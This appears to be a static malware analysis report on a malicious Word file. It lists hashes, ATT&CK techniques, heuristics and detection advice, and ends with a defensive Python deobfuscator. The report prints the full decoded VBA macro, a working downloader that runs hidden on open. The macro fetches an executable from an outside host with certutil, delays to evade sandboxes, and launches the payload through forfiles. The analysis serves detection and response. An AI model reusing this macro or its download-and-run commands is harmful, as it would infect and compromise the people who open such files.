Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7b331459324f82d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 118.0 KB
Created: 2019-08-27 10:59:00
Authoring application: Microsoft Office Word
First seen: 2019-10-30
MD5: bf01fddc5befac4265490fb7be790ca3
SHA-1: d38365a589f039e5fd8dff95d64b49db9560e01d
SHA-256: d7b331459324f82d571b4e67e16417fd770a61c6cbaa6b3bdf3a7e29cc2661d2
Risk score: 190

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The critical OLE_VBA_SHELL and OLE_VBA_OBFUSCATED_SHELL_URL heuristics indicate a malicious VBA macro. Document_Open calls Sub zzzz, which builds the download URL by rewriting "http://regular.pk/sys/microsoftoffice.bbc" to "http://regular.pk/sys/microsoftoffice.exe" with Replace() (the second Replace(), "qsohf" to "https://", is a no-op because the string never contains "qsohf") and builds the drop path %TMP%\filename.exe from Environ$("tmp"), where even the variable name "tmp" is decoded from "trfgmprfg". It then calls Shell() twice with the window hidden (vbHide): first "certutil.exe -urlcache -split -f <url> %TMP%\filename.exe", which fetches the payload with a built-in Windows tool (the name certutil.exe is concatenated one character at a time to defeat string matching), and then, after a 60-second busy-wait on Timer (a delay that never calls a sleep API, so it cannot be skipped by sandboxes that hook or shorten sleeps and simply burns their time budget), "forfiles /p c:\windows\system32 /m notepad.exe /c %TMP%\filename.exe", which launches the dropped file through forfiles rather than directly. The downloaded file is likely a second-stage payload. For detection and response: WINWORD.EXE spawning certutil.exe with -urlcache, or spawning forfiles.exe, is high-signal in process-creation telemetry, and the file to hunt for on a suspected victim is %TMP%\filename.exe.

Heuristics (6)

  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The macro calls Shell(), i.e. it can start arbitrary processes from the document.
  • Obfuscated VBA Shell command with URL (critical) OLE_VBA_OBFUSCATED_SHELL_URL
    The macro invokes Shell with command text assembled through decoder or string-manipulation functions, and that text includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    A Document_Open handler runs automatically when the document is opened with macros enabled, so no further user interaction is needed once the macro warning is accepted.
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    Environ() resolves an environment variable; here it is used to build the drop path under %TMP%.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://regular.pk/sys/microsoftoffice.bbc (referenced by macro). The macro rewrites the ".bbc" suffix to ".exe" before use, so the URL actually requested is http://regular.pk/sys/microsoftoffice.exe; block and hunt for both forms.
    • http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro). This is the standard DrawingML XML namespace URI and is not an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1005 bytes
SHA-256: 31b661851301fa4df90c325d9fdfa8f836fd5552730e6d3900466c8f1564a639
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
zzzz
End Sub
Sub zzzz()
fb = Replace(("http://regular.pk/sys/microsoftoffice.bbc"), "bbc", "exe")
hh = Replace(fb, "qsohf", "https://")
trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("filename.bbc", "bbc", "exe")
Dim dd As String
Shell ("c" + "e" + "r" + "t" + "u" + "t" + "i" + "l" + "." + "e" + "x" + "e" & " -urlcache -split -f " & hh & " " & trfutyjnih), vbHide
rthybfhd (60)
Shell ("forfiles /p c:\windows\system32 /m notepad.exe /c " & trfutyjnih), vbHide
End Sub
Sub rthybfhd(sec)
    Dim temp
    temp = Timer
    Do While Timer - temp < sec
    Loop
End Sub

Attribute VB_Name = "NewMacros"
Sub test1()
'
' test1 Macro
'
'

End Sub
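Added example, not code from the report or from oletools: a small Python deobfuscator that recovers the two Shell() command lines from the macro above by emulating the VBA string operations it relies on (literal concatenation with + and &, Replace(), Environ$()) instead of running it. It also reproduces the OLE_VBA_OBFUSCATED_SHELL_URL idea: a Shell argument that was built through decoders, many concatenated fragments or decoded variables, and that carries a URL. The LOLBIN list, the four-literal threshold and the symbolic %TMP% rendering of Environ$ are assumptions of this example, not the analyzer's rules; the macro text embedded as input is copied from the extracted macros.bas.

```python
# Added example (not code from the report or from oletools): statically recovers the
# Shell() command lines by emulating the VBA string subset the macro uses.
import re

# Constructed input: the body of Sub zzzz() copied from the extracted macro above.
MACRO_SRC = r'''
fb = Replace(("http://regular.pk/sys/microsoftoffice.bbc"), "bbc", "exe")
hh = Replace(fb, "qsohf", "https://")
trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("filename.bbc", "bbc", "exe")
Dim dd As String
Shell ("c" + "e" + "r" + "t" + "u" + "t" + "i" + "l" + "." + "e" + "x" + "e" & " -urlcache -split -f " & hh & " " & trfutyjnih), vbHide
rthybfhd (60)
Shell ("forfiles /p c:\windows\system32 /m notepad.exe /c " & trfutyjnih), vbHide
'''

TOKEN_RE = re.compile(r'\s*(?:"([^"]*)"|([A-Za-z_]\w*\$?)|([()+&,]))')
ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+)$")
SHELL_RE = re.compile(r"^\s*Shell\b(.*)$", re.IGNORECASE)
DECODER_RE = re.compile(r"\b(Replace|Chr|StrReverse|Mid|Split)\s*\(", re.IGNORECASE)
# Assumed list of Windows binaries commonly abused to fetch or proxy-execute payloads.
LOLBINS = {"certutil", "forfiles", "bitsadmin", "mshta", "regsvr32", "rundll32",
           "powershell", "wscript", "cscript", "msiexec"}

def tokenize(text):
    """Split a VBA expression into (kind, value) tokens; stops at the first unknown char."""
    toks, pos = [], 0
    while m := TOKEN_RE.match(text, pos):
        pos = m.end()
        lit, ident, op = m.groups()
        toks.append(("str", lit) if lit is not None else ("id", ident) if ident else ("op", op))
    return toks

class VbaStrings:
    """Recursive-descent evaluator: expr := term (("+"|"&") term)*, term := STRING | "(" expr ")" | IDENT ["(" args ")"]."""
    def __init__(self):
        self.env, self.toks, self.i = {}, [], 0   # env: lower-cased variable name -> resolved string
    def evaluate(self, text):
        self.toks, self.i = tokenize(text), 0
        return self.expr()
    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)
    def take(self, want=None):
        tok, self.i = self.peek(), self.i + 1
        if want and tok != ("op", want):
            raise ValueError(f"expected {want!r}, got {tok!r}")
        return tok
    def expr(self):
        value = self.term()
        while self.peek() in (("op", "+"), ("op", "&")):
            self.take()
            value += self.term()
        return value
    def term(self):
        kind, val = self.take()
        if kind == "str":
            return val
        if (kind, val) == ("op", "("):
            inner = self.expr()
            self.take(")")
            return inner
        if kind != "id":
            raise ValueError(f"unexpected token {kind!r} {val!r}")
        if self.peek() != ("op", "("):
            return self.env.get(val.lower(), f"<{val}>")   # unknown names stay symbolic
        self.take()
        args = [self.expr()]
        while self.peek() == ("op", ","):
            self.take()
            args.append(self.expr())
        self.take(")")
        return self.call(val, args)
    def call(self, name, args):
        fn = name.lower().rstrip("$")
        if fn == "replace" and len(args) == 3:
            return args[0].replace(args[1], args[2])
        if fn == "environ" and len(args) == 1:
            return f"%{args[0].upper()}%"    # environment values stay symbolic, e.g. %TMP%
        return f"<{name}({', '.join(args)})>"

def lolbins_in(command):
    names = [w[:-4] if w.endswith(".exe") else w for w in re.findall(r"[\w.]+", command.lower())]
    return sorted(set(names) & LOLBINS)

def deobfuscate(src):
    """Return one finding per Shell() call: the resolved command and its indicators."""
    ev, decoded, findings = VbaStrings(), set(), []
    for line in src.splitlines():
        if m := ASSIGN_RE.match(line):
            name, rhs = m.group(1).lower(), m.group(2)
            ev.env[name] = ev.evaluate(rhs)
            if DECODER_RE.search(rhs) or {v.lower() for k, v in tokenize(rhs) if k == "id"} & decoded:
                decoded.add(name)    # went through a decoder, directly or via another variable
        elif m := SHELL_RE.match(line):
            arg, toks = m.group(1), tokenize(m.group(1))
            command = ev.evaluate(arg)
            # OLE_VBA_OBFUSCATED_SHELL_URL pattern: command text built by decoders, many
            # concatenated fragments or decoded variables, and carrying a URL
            obfuscated = (bool(DECODER_RE.search(arg)) or sum(k == "str" for k, _ in toks) >= 4
                          or bool({v.lower() for k, v in toks if k == "id"} & decoded))
            urls = re.findall(r"https?://[^\s\"']+", command)
            findings.append({"command": command, "urls": urls, "lolbins": lolbins_in(command),
                             "obfuscated_shell_url": obfuscated and bool(urls)})
    return findings
```

Calling deobfuscate(MACRO_SRC) yields two findings: the certutil download line (URL http://regular.pk/sys/microsoftoffice.exe, LOLBIN certutil, pattern hit) and the forfiles launch line (no URL, LOLBIN forfiles, so no pattern hit on its own). Keeping Environ$ symbolic is deliberate: the real drop directory is only known on the victim machine, and rendering it as %TMP% keeps the indicator portable to EDR searches.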